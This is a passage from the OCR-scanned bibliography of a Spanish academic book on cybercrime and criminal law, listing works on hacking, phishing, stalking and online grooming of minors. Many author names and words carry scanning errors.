ciberdelitos", en J.L. DE LA CUESTA ARZAMENDI ET AL. (dirs) . Armonización penal en
Europa, Oñati Instituto Vasco de Administración Pública, pp. 367-389.
RoMEo CASABONA, C. M. (2016) . RoMEo CASABONA & SOLA REcHE & BornovA PASAMAR (coords.)
Derecho penal, Parte especial, conforme a las Leyes Orgánicas 1 y 2 /2015, de 30
de marzo, Comares, Granada.
RosENZWEIG, R. ( 1998). "Wizards, Bureaucrats, Warriors, and Hackers: Writing the
History of the Internet", The American Historícal Review, Vol. 103, No. 5. (Dec.,
pp. 1530-1552
RUBIALES füJAR, E.E. (2010). "Bullying y Derecho penal", en MORILLAS CUEVA, L. (Dir.) &
SuAru:z LóPEZ, J.M. (Coord.): El menor como víctima y victimario de la violencia
social (estudio jurídico). Dykinson, Madrid.
RuEDA MARTIN, M. Á. (2018). La nueva protección de la vida privada y de los sistemas de
información en el Código penal. Atelier, Barcelona.
SANCHEZ GARCIA DE PAZ, Mª .I. (2007). "Violencia en la escuela: tratamiento penal del
acoso escolar desde el sistema del Derecho penal de menores", en VV.AA. Los
derechos fundamentales en la educación. Cuadernos de derecho judicial, Madrid.
SANCHís PRIETO, C. (2012). "La prueba en soporte electrónico", en GAMERO CASADO,
E. & VALERO ToRRIJOS, J. (Coords.). Las Tecnologías de la Información y de la
Comunicación en la Administración de Justicia. Análisis sistemático de la Ley
18/2011, de 5 de julio. Thomson Reuters Aranzadi, Pamplona.
SANTA CECILIA GARCÍA, F. (2014). "Acoso sexual a menores mediante tecnologías de la
comunicación («child grooming») ", La Ley Derecho de familia, 8201, edición digital.
SANZ DELGADO, E. (2012). Introducción a la técnica de resolución de casos prácticos de
Derecho penal. Edisofer, Madrid.
ScHWARTZ-WATTS, D.M. (2006). "Commentary: Stalking Risk Profile", The Journal ofthe
American Academy of Psychiatry and the Law, 34, 4, edición digital.
ScHWARTZ-WATTS, D.M., MoRGAN D.W., & BARNES, C. (1998). "Stalkers: the South Carolina
experience", The Journal of the American Academy of Psychiatry and the Law, 2,
pp. 541- 545.

- 363 -
Bibliografia

SERRANO MA11w, A. (2009). Introducción a la Criminología. 6 ª Ed., Dykinson, Madrid.


SHAPIRO, A.L. ( 1999). "Privacy for Sale: Peddling Data on the Internet", Human Rights,
26(1), 10-12. Recuperado de: http://www.jstor.org/stable/27880131 (último
acceso 15.07.2019)
SKJNNER, W.F. & FREAM, A.M. (1997). ''A social learning theory analysis of computer
crime among college students", Journal of Research In Crime & Delinquency,
34(4), pp. 495-518.
SuAREz EsPrno, M.L. (2008). "Comentario a la STC 235/2007, de 7 de noviembre, por
la que se declara la inconstitucionalidad del delito de negación del genocidio",
Indret, 2, edición digital.
SuBIJANA ZUNZUNEGIB, l. J. (1997). "El informe criminológico en el ámbito judicial",
Eguzkilore, 11, pp. 141-156.
TAMARIT SUMALLA, J. M. (2006) . "La victimología: cuestiones conceptuales y
metodológicas", en Manual de Victimología, Enrique Echeburúa Odriozola et
al. (coord.), Tirant lo Blanch, Valencia, pp. 17-50.
TAYLOR, P. ( 1999). Hackers: Crime in the Digital Sublime. Routledge, London.
TAYLOR, R. (1999). Hackers -Cyberpunks or Microserfs?, in Information, Communication
and Society. Auerbach Publications Taylor & Francis Group, Boca Raton
(Florida) .
TEMPLETON, B. Origin ofthe term "spam" to mean net abuse -https://www.templetons.
com/brad/spamterm.html (último acceso 15.07.2019)
TIRADO ESTRADA, J. (2016). La protección penal de la propiedad intelectual en la era
digital (Análisis tras la reforma del Código Penal de 2015. Granada, Comares.
TrssERON, S. (2011). "Intimité et extimité", Communications, 88(1), 83-91. doi:10.3917 /
commu.088.0083.
ToMAs-VALIENTE LANUZA, C. (2015). ''Art. 197 bis", en GóMEz TOMILLO (dir.) Comentarios
prácticos al Código penal, vol. 2, Thomson Reuters Aranzadi.
TRABAZO ARIAS, V., AzoR LAFARGA, F. (2009). "La pedofilia: un problema clínico, legal y
social", EduPsykhé: Revista de psicología y psicopedagogía, ISSN 1579-0207,
Vol. 8, Nº. 2.
UNODOC (2013). Comprehensive Study on Cybercrime. Disponible online en:
https://www.unodc.org/ documents/ organized-crime /UNODc_ccPCJ_
EG.4_2013/ CYBERCRIME_STUDY_210213.pdf
VANDER WAGEN, Wytske & PIETERS, Wolter (2018). "The hybrid victim: Reconceptualizing
high-tech cyber victimization through actor-network theory", European
Journal ofCriminology. https://doi.org/10.1177 /1477370818812016
VAZQUEZ GoNzA1Ez, C. (2018). Casos prácticos de Derecho penal. Material de estudio para
un aprendizaje teórico/práctico del Derecho penal. Dykinson, Madrid.
VELAsco NuÑEZ, E. (2006) . ''Aspectos procesales de la investigación y de la defensa en
los delitos informáticos", Diario La Ley, 6506, 16 de junio, edición digital.

- 364 -
Bibliografta

VELASCO NUÑEZ, E. (2007). "Fraudes informáticos en red: del phishing al pharming", La


Ley Penal, 37, edición digital.
VELAsco NUÑEZ, E. (2008). "Estafa informática y banda organizada. Phishing, pharming,
smishing y muleros", La Ley Penal, 49, edición digital.
VELAsco NUÑEz, E. (2010). Delitos cometidos a través de internet. Wolter Kluwers, La
Ley, Madrid.
VELAsco NUÑEZ, E. (2011). "Delitos informáticos realizados en actuación organizada",
Diario La Ley, 7743, edición digital.
VELAsco SAN MART1N, C. (2016). Jurisdicción y competencia penal en relación al acceso
transfronterizo en materia de ciberdelitos. Valencia, Tirant lo Blanch.
VrnAL HERRERo-VmR, M.S. (2016). Delincuenciajuvenil "online": el menor infractor y las
tecnologías de la información y la comunicación. Juruá, Lisboa.
VILLACAMPA EsTIARTE, C. & GóMEZ AmnóN, M.J.(2016). "Nuevas tecnologías y victimización
sexual de menores por online grooming", Revista Electrónica de Ciencia Penal y
Criminología, 18, pp. 1-27.
VILLACAMPA EsTIARTE, C. (2009). Stalking y Derecho penal. Relevancia jurídico-penal de
una nueva forma de acoso. lustel, Madrid.
VILLACAMPA EsTIARTE, C. (2013). "El proyectado delito de acecho: incriminación del
stalking en Derecho penal español", Cuadernos de Polftica Criminal, 109, 1,
Época 11, pp.
VILLACAMPA EsTIARTE, C. (2014). "Propuesta sexual telemática a menores u 'online child
grooming': configuración presente del delito y perspectivas de modificación",
Estudios Penales y Criminológicos, 34, pp. 639.
VILLACAMPA EsTIARTE, C. (2015). El delito de online child grooming o propuesta sexual
telemática a menores. Tirant lo Blanch, Valencia.
VILLACAMPA EsTIARTE, C. (2015). "El delito de stalking", en QUINTERO OLIVARES, G. (Dir.):
Comentario a la reforma penal de 2015. Parte Especial. Aranzadi, Pamplona.
WALL, D.S. (Ed.) (2003). Cyberspace Crime, Routledge.
WALL, D.S. (2007). Cybercrime: The Transformation of Crime in the Information Age,
Polity Press, Malden.
WATKINS S. G. (2008). An Introduction to Information Security and IS027001: A Pocket
Cuide. Editorial: IT Governance Publishing.
WEULEN KRANENBARGM., HoLTB T. & VAN GELDERC J.-L. (2019). "Offending and Victimization
in the Digital Age: Comparing Correlates of Cybercrime and Traditional
Offending-Only, Victimization-Only and the Victimization-Offending Overlap",
Deviant Behavior 40 ( 1), 40-55.
W1KsTROM, P.H. (2010). "Explaining crime as moral actions", en HITLIN, S. & VAISEY, S.
(Eds.). Handbook of the sociology ofmorality. Springer, New York, pp. 211-239.
YAR, M. (2006). Cybercrime and society. Sage, London.

- 365 -

También podría gustarte